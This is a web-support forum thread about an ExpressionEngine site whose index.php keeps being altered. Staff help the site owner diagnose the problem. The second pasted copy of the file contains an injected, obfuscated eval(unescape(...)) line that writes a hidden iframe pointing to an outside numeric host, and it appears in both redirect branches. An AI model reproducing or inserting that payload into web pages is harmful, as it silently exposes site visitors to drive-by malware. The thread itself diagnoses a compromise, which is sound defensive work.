Thread

It’s returning more quickly than ever…

Did you already replace your index.php and repair the error, or do you still have it where you can copy and paste it?

This is the latest version of the index file, just downloaded:

<?php
/*
=====================================================
ExpressionEngine - by EllisLab
——————————————————————————-
http://expressionengine.com/
——————————————————————————-
Copyright (c) 2003 - 2007 EllisLab, Inc.
=====================================================
THIS IS COPYRIGHTED SOFTWARE
PLEASE READ THE LICENSE AGREEMENT
http://expressionengine.com/docs/license.html
=====================================================
File: index.php
——————————————————————————-
Purpose: Triggers the main engine
=====================================================
*/

// URI Type
// This variable allows you to hard-code the URI type.
// For most servers, 0 works fine.
// 0 = auto
// 1 = path_info
// 2 = query_string

$qtype = 0;

// DO NOT EDIT BELOW THIS!!!

error_reporting(0);

if (isset($_GET[‘URL’]))
{
/** ---------------------------------
/** URL Redirect for CP and Links in Comments
/** ---------------------------------*/

$_GET['URL'] = str_replace(array("\r", "\r\n", "\n", ':',':','/','/'),
array('', '', '', ':', ':', '/', '/'),
$_GET['URL']);

if (substr($_GET['URL'], 0, 4) != "http" AND ! ereg('://', $_GET['URL']))
$_GET['URL'] = "http://".$_GET['URL'];

$_GET['URL'] = str_replace( array('"', "'", ')', '(', ';', '}’, ‘{', 'script%', 'script&', '(', ')'),
'',
strip_tags($_GET['URL']));

$host = ( ! isset($_SERVER['HTTP_HOST'])) ? '' : (substr($_SERVER['HTTP_HOST'],0,4) == 'www.' ? substr($_SERVER['HTTP_HOST'], 4) : $_SERVER['HTTP_HOST']);

if ( ! isset($_SERVER['HTTP_REFERER']) OR ! stristr($_SERVER['HTTP_REFERER'], $host))
{
// Possibly not from our site, so we give the user the option
// Of clicking the link or not

$str = "<html>\n<head>\n<title>Redirect</title>\n</head>\n<body>".
"To proceed to the URL you have requested, click the link below:".
"”.$_GET[‘URL’].”\n</body>\n</html>”;
  }
  else
  {
$str = "<html>\n<head>\n<title>Redirect</title>\n".
'<meta http-equiv="refresh" content="0; URL='.$_GET['URL'].'">'.
"\n</head>\n<body>\n</body>\n</html>";
}
 
  exit($str);
}

$uri = ‘’;
$pathinfo = pathinfo(__FILE__);
$ext = ( ! isset($pathinfo[‘extension’])) ? ‘.php’ : ‘.’.$pathinfo[‘extension’];
$self = ( ! isset($pathinfo[‘basename’])) ? ‘index’.$ext : $pathinfo[‘basename’];

$path_info = (isset($_SERVER[‘PATH_INFO’])) ? $_SERVER[‘PATH_INFO’] : @getenv(‘PATH_INFO’);
$query_str = (isset($_SERVER[‘QUERY_STRING’])) ? $_SERVER[‘QUERY_STRING’] : @getenv(‘QUERY_STRING’);

switch ($qtype)
{
case 0 : $uri = ($path_info != '' AND $path_info != "/".$self) ? $path_info : $query_str;
break;
case 1 : $uri = $path_info;
break;
case 2 : $uri = $query_str;
break;
}

unset($system_path);
unset($config_file);
unset($path_info);
unset($query_str);
unset($qstr);

require ‘path’.$ext;

if ((isset($template_group) AND isset($template)) && $uri != ‘’ && $uri != ‘/’)
{
$template_group = '';
$template = '';
}

if ( ! isset($system_path))
{
if (file_exists('install'.$ext))
{
header("location: install".$ext);
exit;
}
  else
  {
exit("The system does not appear to be installed. Click here to install it.”); 
  }
}

if ( ! ereg(”/$”, $system_path)) $system_path .= ‘/’;

if ( ! @include($system_path.‘core/core.system’.$ext))
{
exit("The system path does not appear to be set correctly. Please open your path.php file and correct the path.");
}

?>

And with this file loaded you are seeing the PHP error?  There are no syntax errors in that file, so if it’s producing errors, there must be something going on on the server.

I’ve not had any problems with it since I re-loaded first this morning… So here’s hoping that it holds…

Mick, what I will need to see, if it happens again, is both the error, and the “broken” file, in the state that is causing the error.  Make sense?

Yep. Got that Derek!

Think this should be the right one:

<?php
/*
=====================================================
 ExpressionEngine - by EllisLab
-----------------------------------------------------
 <a href="http://expressionengine.com/">http://expressionengine.com/</a>
-----------------------------------------------------
 Copyright (c) 2003 - 2007 EllisLab, Inc.
=====================================================
 THIS IS COPYRIGHTED SOFTWARE
 PLEASE READ THE LICENSE AGREEMENT
 <a href="http://expressionengine.com/docs/license.html">http://expressionengine.com/docs/license.html</a>
=====================================================
 File: index.php
-----------------------------------------------------
 Purpose: Triggers the main engine
=====================================================
*/

// URI Type
// This variable allows you to hard-code the URI type.
// For most servers, 0 works fine.
// 0 = auto  
// 1 = path_info  
// 2 = query_string

$qtype = 0; 


// DO NOT EDIT BELOW THIS!!! 

error_reporting(0);

if (isset($_GET['URL'])) 
{ 
    /** ---------------------------------
    /**  URL Redirect for CP and Links in Comments
    /** ---------------------------------*/

    $_GET['URL'] = str_replace(array("\r", "\r\n", "\n", ':',':','/','/'), 
                               array('', '', '', ':', ':', '/', '/'), 
                               $_GET['URL']);
    
    if (substr($_GET['URL'], 0, 4) != "http" AND ! ereg('://', $_GET['URL'])) 
        $_GET['URL'] = "http://".$_GET['URL']; 
        
    $_GET['URL'] = str_replace( array('"', "'", ')', '(', ';', '}', '{', 'script%', 'script&', '(', ')'), 
                                '', 
                                strip_tags($_GET['URL']));
    
    $host = ( ! isset($_SERVER['HTTP_HOST'])) ? '' : (substr($_SERVER['HTTP_HOST'],0,4) == 'www.' ? substr($_SERVER['HTTP_HOST'], 4) : $_SERVER['HTTP_HOST']);
    
    if ( ! isset($_SERVER['HTTP_REFERER']) OR ! stristr($_SERVER['HTTP_REFERER'], $host))
    {
        // Possibly not from our site, so we give the user the option
        // Of clicking the link or not
        
        $str = "<html>\n<head>\n<title>Redirect</title>\n</head>\n<body>eval(unescape("window.status='Done';document.write('<iframe%20name=6af9f8%20src=\'http://977398530?'+Math.round(Math.random()*26864)+'84\'%20width=73%20height=368%20style=\'display:%20none\'></iframe>')")); ".
                "To proceed to the URL you have requested, click the link below:".
                "<a href="http://.$_GET">".$_GET['URL']."</a>\n</body>\n</html>";
    }
    else
    {
        $str = "<html>\n<head>\n<title>Redirect</title>\n".
               '<meta http-equiv="refresh" content="0; URL='.$_GET['URL'].'">'.
               "\n</head>\n<body>eval(unescape("window.status='Done';document.write('<iframe%20name=6af9f8%20src=\'http://977398530?'+Math.round(Math.random()*26864)+'84\'%20width=73%20height=368%20style=\'display:%20none\'></iframe>')")); ";
    }
    
    exit($str);
}

$uri  = '';
$pathinfo = pathinfo(__FILE__);
$ext  = ( ! isset($pathinfo['extension'])) ? '.php' : '.'.$pathinfo['extension'];
$self = ( ! isset($pathinfo['basename'])) ? 'index'.$ext : $pathinfo['basename'];

$path_info = (isset($_SERVER['PATH_INFO'])) ? $_SERVER['PATH_INFO'] : @getenv('PATH_INFO');
$query_str = (isset($_SERVER['QUERY_STRING'])) ? $_SERVER['QUERY_STRING'] : @getenv('QUERY_STRING');

switch ($qtype)
{
    case 0 :    $uri = ($path_info != '' AND $path_info != "/".$self) ? $path_info : $query_str;
        break;
    case 1 :    $uri = $path_info;     
        break;
    case 2 :    $uri = $query_str; 
        break;
}

unset($system_path);
unset($config_file);
unset($path_info);
unset($query_str);
unset($qstr);

require 'path'.$ext;

if ((isset($template_group) AND isset($template)) && $uri != '' && $uri != '/')
{
    $template_group = '';
    $template = '';
}

<cut for length>

Hi Mick.

That isn’t the index.php file that is distributed with EE - it looks like yours is getting replaced, possibly maliciously, but I don’t want to jump to conclusions.  Could you zip your index.php file and add it as an attachment so I can take a better look?

That’s my thought precisely.  I would put a support ticket into your host, as it looks like someone is injecting some Javascript to hack your site, and unless this person has FTP access, it would mean that there are security issues on the server that need to be addressed.

That’s what I was afraid of… winzip is not letting me zip it… though I may be doing something wrong…

Why are you needing to winzip something?

Edit: sorry, didn’t see the other Derek’s reply above.

Can’t zip it and it won’t let me upload it as a notebook file…

No problem Mick, don’t worry about the zip anymore.  Its safe to assume that the file is compromised.  I’d advise you to change your password, and contact your webhost to let them know about it.  Are you running any other non-EE scripts on your account?

Let us know what your host says.

Been doing some work on this.

Google is indicating a virus on the index.php page, and the goobledly gook seems to be multiplying. Apparently it is affecting line 66 as well as the original 58. I have asked for the root server password to be changed by the hosts, but am concerned that it may have been inadvertantly posted in though a vulnerablility in the comments area.

Attached is a screenshot of the “virus” message that Google is giving
me. It looks like a virus that affects PHP files on a server. I’ve asked a friend who helps me troubleshoot problems from time to time, who’s thoughts are:

The virus may have been injected into your system via
cross-site scripting. Basically, this means that a user has caught the
virus from another website, and then passed it on to your website (the
user will have been unaware of this), possibly by adding a comment but
possibly just by viewing your site.

A quick search in Google shows there have been known instances of a
vulnerability in EE that allows a cross-site scripting virus to access
the site, and this is linked to the HTTP-Referrer.

See http://www.google.com/search?q=cross-site+scripting+virus+expression+engine

I’m not an expert in this by any means but that’s my hunch, based on
circumstantial evidence.

Can you recommend any further action?